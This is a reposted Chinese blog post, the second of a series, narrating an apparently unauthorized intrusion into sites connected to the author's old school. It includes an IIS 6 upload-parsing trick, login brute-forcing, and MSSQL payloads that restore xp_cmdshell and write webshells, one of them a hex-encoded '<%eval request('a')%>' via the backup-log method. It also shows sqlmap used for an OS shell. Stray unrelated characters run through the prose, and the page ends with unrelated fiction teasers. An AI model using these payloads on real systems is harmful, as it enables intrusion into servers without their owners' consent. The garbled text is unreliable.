連載 - part 2 - 滲透紀(jì)實(shí)之母校官網(wǎng)

來源:http://bbs.ichunqiu.com/thread-9296-1-1.html?from=ch

前奏在這里隶债,傳送門:滲透紀(jì)實(shí)之母校官網(wǎng)不謝临谱。

#線索中斷

等我放學(xué)回家的時(shí)候??不好意思??服務(wù)器掉了 后門掉了??漏洞補(bǔ)了??導(dǎo)致內(nèi)網(wǎng)線索斷了

沒錯(cuò) 斷了 就這樣斷了!

#無奈繼續(xù)擼旁站內(nèi)網(wǎng)

N久搞到個(gè)后臺(tái)

第一次見 powereasy 這個(gè)版本 由于是iis6.0??隨便找個(gè)上傳不改名的的地方上傳類似1.asp;1.jpg之類的文件就能解析

仔細(xì)研究了下??在 系統(tǒng)設(shè)置-模板標(biāo)簽管理-模板管理 底部上傳一個(gè)1.asp;1.html的文件就ok-

左邊我圈的地方 模板名套利,我下載個(gè)程序研究了下路徑推励,是這樣:

根目錄/Template/模板名/binghe.asp;binghe.html

這里就是

***.com/Template/海洋之星模板方案/1.asp;1.html

很容易的拿到了shell

很容易的提權(quán)

是個(gè)內(nèi)網(wǎng),轉(zhuǎn)發(fā)肉迫,然后就沒有然后了验辞,給你兩張圖自己體會(huì)

#不能放棄,但何時(shí)是個(gè)頭喊衫?

為什么還要拿旁站跌造,因?yàn)樯洗文孟碌奶?進(jìn)不去服務(wù)器??無法內(nèi)網(wǎng)滲透

目標(biāo):http://www.********.com

先來張圖

但是不好意思??這是半年前的菜刀緩存,現(xiàn)在已經(jīng)掉了族购,想拿回來進(jìn)內(nèi)網(wǎng)

人老了啊壳贪,就好忘事 忘了怎么拿的了 主頁逛了半天??沒發(fā)現(xiàn)注入啥的 這個(gè)小站你還指望什么xss打管理?幾年登陸一次

找到個(gè)博客的二級目錄

注冊個(gè)用戶進(jìn)去??沒有管理權(quán)限??于是乎收集原博客用戶 著手爆破

我很心痛 這密碼寝杖。违施。。

文件管理各種截?cái)?各種潛規(guī)則測試無果 結(jié)論 :這個(gè)后臺(tái)并無卵用(大派唬可以試試)

接著發(fā)現(xiàn)幾個(gè)都是二級目錄先看OA

小菜見識(shí)短淺 不曾見過這種??更別說漏洞什么的

學(xué)習(xí)了烏云大牛的邏輯漏洞磕蒲,判斷出這里確實(shí)可以用于爆破用戶名留潦,存在的用戶名和不存在的用戶名 腳本給的response不一樣,經(jīng)測試 admin一定是存在的

用burp枚舉密碼嘍辣往,因?yàn)檫@里沒驗(yàn)證嘛兔院,密碼判斷出是admin,登錄試試

嗯站削? 隨便一個(gè)密碼試試坊萝,這樣子

什么鬼?密碼正確還不給進(jìn)去??難道钻哩。屹堰。〗智猓可能限制了ip啥的 或者是什么新的技術(shù)??小菜慚愧

后來轉(zhuǎn)來轉(zhuǎn)去竟然有越權(quán)漏洞

這個(gè)

和這個(gè)

sa密碼出來了??由于是內(nèi)網(wǎng) 直連不行??試著在sql執(zhí)行池里執(zhí)行幾個(gè)語句 哇擦 沒有回顯扯键。

執(zhí)行

[AppleScript]純文本查看復(fù)制代碼

?

exec master..xp_cmdshell 'ver'

顯示錯(cuò)誤

恢復(fù)一下xp_cmdshell

[AppleScript]純文本查看復(fù)制代碼

?

1

2EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'declare @o int

sp_addextendedproc 'xp_cmdshell','xpsql70.dll'

再執(zhí)行

[AppleScript]純文本查看復(fù)制代碼

?

exec master..xp_cmdshell 'ver'

這次不顯錯(cuò)了??說明語句已經(jīng)運(yùn)行??沒有回顯而已

在菜刀緩存里面得到網(wǎng)站絕對路徑 嘗試echo寫shell

[AppleScript]純文本查看復(fù)制代碼

?

exec master..xp_cmdshell 'echo"123">e:\inetpub\wwwroot\oa\cs\1.asp'

訪問無果 什么鬼? 難道管理員上次發(fā)現(xiàn)被黑??換了服務(wù)器珊肃?

來利用他這個(gè)執(zhí)行錯(cuò)誤就報(bào)錯(cuò)的特性判斷目錄存在

[AppleScript]純文本查看復(fù)制代碼

?

exec master.dbo.xp_subdirs 'e:\binghesec\';//測試一個(gè)不存在的目錄

果然報(bào)錯(cuò)

[AppleScript]純文本查看復(fù)制代碼

?

exec master.dbo.xp_subdirs 'e:\inetpub\wwwroot\oa\';//測試原根目錄

不報(bào)錯(cuò)荣刑。。

這我就不明白了 什么鬼伦乔?厉亏???!A液汀0弧!

再試試備份法

[AppleScript]純文本查看復(fù)制代碼

?

alter database mastersetRECOVERY FULL--

create table cmd(aimage)--

backuplogmastertodisk='c:\cmd1'withinit--

insertintocmd(a)values(0x3C256576616C20726571756573742822612229253E)--

backuplog[northwind]todisk='e:\inetpub\wwwroot\oa\1.asp'--

drop table cmd--

0x3C256576616C20726571756573742822612229253E是hex的<%eval request(“a”)%>

再試試訪問1.asp招刹,同樣是fuck the dog恬试,404,sa 都搞不定 我也是醉了

以下是mssql存儲(chǔ)過程寫文件 都沒成功

[AppleScript]純文本查看復(fù)制代碼

?

1

2

3

4

5

6exec master.dbo.xp_subdirs 'c:\www\';

exec sp_makewebtask 'c:\www\hack.asp','select''<%execute(request("SB"))%>'' '

declare @o int,@f int,@t int,@ret int

exec sp_oacreate 'scripting.filesystemobject',@o out

exec sp_oamethod @o,'createtextfile',@f out,'c:\testing.txt',1

exec @ret=sp_oamethod @f,'writeline',NULL,<>

看來我得放棄這里了

再回到OA疯暑,看了半天沒什么進(jìn)展训柴,望著主頁發(fā)呆,隨手習(xí)慣性輸入‘or’=’or’ , 點(diǎn)登陸竟然沒反應(yīng) 竟然不提示不存在該用戶 很明顯的注入啦 抓個(gè)包 丟sqlmap

sqlmap -r '/tmp/log.txt'

–is-dba返回yes??來–os-shell,結(jié)果令我失望

注意看我圈的地方??說明取得不到回顯 這對我們獲得信息很不利

大牛說在os-shell無回顯的情況下妇拯,寫一個(gè)cmd命令??下面這里選n幻馁,命令其實(shí)已經(jīng)運(yùn)行了

執(zhí)行echo寫個(gè)shell到根目錄 試試訪問 也不行

直接cmd不行 那咱來sql-shell自己執(zhí)行試試 還是不行

百般無奈??退而求其次??跑數(shù)據(jù)??進(jìn)后臺(tái)。

竟然是這樣越锈,誰能告訴我為什么sa竟然跑不出數(shù)據(jù)??

嘗試編碼 —hex 和—no-cast 也是不行

說到這里??我已經(jīng)什么都不想說了 給我根繩子吧??結(jié)實(shí)點(diǎn)的仗嗦!

#結(jié)語

說了這么多就是沒搞下!還得多學(xué)習(xí)甘凭!

未完待續(xù)稀拐,下篇終結(jié) ,有些知識(shí)點(diǎn)還是可以看看的哦对蒲。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末钩蚊,一起剝皮案震驚了整個(gè)濱河市,隨后出現(xiàn)的幾起案子蹈矮,更是在濱河造成了極大的恐慌砰逻,老刑警劉巖,帶你破解...
    沈念sama閱讀 222,946評論 6 518
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件泛鸟,死亡現(xiàn)場離奇詭異蝠咆,居然都是意外死亡,警方通過查閱死者的電腦和手機(jī)北滥,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 95,336評論 3 399
  • 文/潘曉璐 我一進(jìn)店門刚操,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人再芋,你說我怎么就攤上這事菊霜。” “怎么了济赎?”我有些...
    開封第一講書人閱讀 169,716評論 0 364
  • 文/不壞的土叔 我叫張陵鉴逞,是天一觀的道長。 經(jīng)常有香客問我司训,道長构捡,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 60,222評論 1 300
  • 正文 為了忘掉前任壳猜,我火速辦了婚禮勾徽,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘统扳。我一直安慰自己喘帚,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 69,223評論 6 398
  • 文/花漫 我一把揭開白布闪幽。 她就那樣靜靜地躺著啥辨,像睡著了一般。 火紅的嫁衣襯著肌膚如雪盯腌。 梳的紋絲不亂的頭發(fā)上溉知,一...
    開封第一講書人閱讀 52,807評論 1 314
  • 那天,我揣著相機(jī)與錄音腕够,去河邊找鬼级乍。 笑死,一個(gè)胖子當(dāng)著我的面吹牛帚湘,可吹牛的內(nèi)容都是我干的玫荣。 我是一名探鬼主播,決...
    沈念sama閱讀 41,235評論 3 424
  • 文/蒼蘭香墨 我猛地睜開眼大诸,長吁一口氣:“原來是場噩夢啊……” “哼捅厂!你這毒婦竟也來了贯卦?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 40,189評論 0 277
  • 序言:老撾萬榮一對情侶失蹤焙贷,失蹤者是張志新(化名)和其女友劉穎撵割,沒想到半個(gè)月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體辙芍,經(jīng)...
    沈念sama閱讀 46,712評論 1 320
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡啡彬,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 38,775評論 3 343
  • 正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了故硅。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片庶灿。...
    茶點(diǎn)故事閱讀 40,926評論 1 353
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡,死狀恐怖吃衅,靈堂內(nèi)的尸體忽然破棺而出往踢,到底是詐尸還是另有隱情,我是刑警寧澤徘层,帶...
    沈念sama閱讀 36,580評論 5 351
  • 正文 年R本政府宣布菲语,位于F島的核電站,受9級特大地震影響惑灵,放射性物質(zhì)發(fā)生泄漏山上。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 42,259評論 3 336
  • 文/蒙蒙 一英支、第九天 我趴在偏房一處隱蔽的房頂上張望佩憾。 院中可真熱鬧,春花似錦干花、人聲如沸妄帘。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,750評論 0 25
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽抡驼。三九已至,卻和暖如春肿仑,著一層夾襖步出監(jiān)牢的瞬間致盟,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 33,867評論 1 274
  • 我被黑心中介騙來泰國打工尤慰, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留馏锡,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 49,368評論 3 379
  • 正文 我出身青樓伟端,卻偏偏與公主長得像杯道,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個(gè)殘疾皇子责蝠,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 45,930評論 2 361

推薦閱讀更多精彩內(nèi)容